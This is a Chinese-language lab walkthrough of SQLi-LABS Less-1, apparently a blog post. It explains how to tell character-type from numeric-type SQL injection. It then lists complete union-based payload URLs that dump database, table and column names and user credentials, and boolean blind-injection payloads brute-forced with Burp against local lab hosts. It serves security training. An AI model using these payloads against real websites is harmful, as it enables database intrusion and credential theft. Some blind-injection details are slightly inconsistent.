SQLi-LABS Page-1(Basic Challenges)
输入?id=1,可以执行
![image.png](https://i-blog.csdnimg.cn/blog_migrate/109bec709abdf55aad09fc11f27d54a5.png)
在后面加一个单引号 ’ ,出现错误,应为 本来的是 ‘1’,变成了’1’',后面两个单引号闭合,所以报错。
理解:?id=1 and 1=2
可以发现回显为正确,所以可以发现是字符型注入
判断字符型注入还是数字型注入
- 若在GET请求中?id=1 and 1=1和?id=1 and 1=2都没有报错,则是字符型注入。
- 若在GET请求中?id=1 and 1=1没有报错,但是?id=1 and 1=2有异常或没回显,则是数字型注入。
证明:
1.
若注入?id=1 and 1=2,数据库中的查询语句为:
select * from user where id=‘1 and 1=2’;
因为id为int类型,所以传入的 ‘1 and 1=2’ 会强制转换成 ‘1’ ,=>最终数据库中的查询语句为:
select * from user where id=‘1’;
所以sql语句不会报错,所以是字符型注入。
强制转换:
若是数字型注入,则注入 ?id=1 and 1=2 是的sql语句是:
select * from user where id=1 and 1=2
因为 select * from users where id=1 是正确的语句 ,and 后面的 1=2 是错误的语句,所以select * from users where id=1 and 1=2 会有异常或着网页没有回显
字符型注入构造参数传递:
1 and 1=1
SQL语句: select name from users where id=‘1 and 1=1’
1’ and ‘1’='1
SQL语句: select name from users where id=‘1’ and ‘1’=‘1’
1’ and 1=1 # (#号编码为%23) 或者–+
SQL语句: select name from users where id=‘1’ and 1=1 #’
1’ and 1=2 # (%23)
SQL语句: select name from users where id=‘1’ and 1=2 #’
LESS-1
get显错注入
爆数据库:
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata–+
此时的sql 语句为
SELECT * FROM users WHERE id=’-1’union select 1,group_concat(schema_name),3 from information_schema.schemata–+ LIMIT 0,1
爆security数据库的数据表
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27–+
此时的sql 语句SELECT * FROM users WHERE id=’-1’union select 1,group_concat(table_n
ame),3 from information_schema.tables where table_schema=’security’–+ LIMIT 0,1
爆users 表的列
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27–+
此时的sql 语句为
SELECT * FROM users WHERE id=’-1’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’–+ LIMIT 0,1
爆数据
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=4–+
此时的sql 语句为
SELECT * FROM users WHERE id=’-1’union select 1,username,password from users where id=4 --+ LIMIT 0,1
get盲注
前置sql基础
length('name'):函数返回字符串的长度
substr('name',1,1):函数截取字符串
ascii('a'):函数返回字符的ascii码
left('name',2):函数返回name的左边二个字符
right('name',2):函数返回name的右边二个字符
原理
在页面中,如果正确执行了SQL语句,则返回一种页面,如果SQL语句执行错误,则执行另一种页面。基于两种页面显示内容的不同,来判断SQL语句执行正确与否,从而达到获取数据的目的
步骤
-
获取当前数据库长度
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and length(database())=8 --+
然后用burp对8进行爆破
-
获取当前数据库名
用burp对1,115进行爆破
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and ascii(substr(database(),1,1))=115 --+
-
获取当前数据库表总数
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
-
获取数据库表的长度
burp对0,6进行爆破
第一个表长度
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6–+
第二个表长度
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8–+
-
获取数据库表名
第一个表名:emalis
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+第二个表名:referers
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1))=109 --+
得到所有表名:emails,referers,uagents,users -
获取数据库表的字段总数
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select count(column_name) from information_schema.columns where table_name=‘emails’ and table_schema=database())=2 --+
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select count(column_name) from information_schema.columns where table_name=‘users’ and table_schema=database())=3 --+
- 获取数据库表字段长度
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and (select length(column_name) from information_schema.columns where table_name=‘emails’ and table_schema=database() limit 0,1)=2 --+
- 获取数据库表字段名
1’ and substr((select column_name from information_schema.columns where
table_name=‘emails’ and table_schema=database() limit 0,1),1,1)=101 --+
确定字段名为 ie
- 获取数据库表的字段内容
http://192.168.220.130/sqlilabs/Less-1/?id=1’ and ascii(substr((select concat(id,email_id) from emails limit 0,1),1,1))=49 --+
对照asc码表字段内容为12345678
burpsuite 出现的bug:
点击爆破,出现Incalid number settings,是因为burp出现了bug
解决方法:点击下面的hex,再点击decimal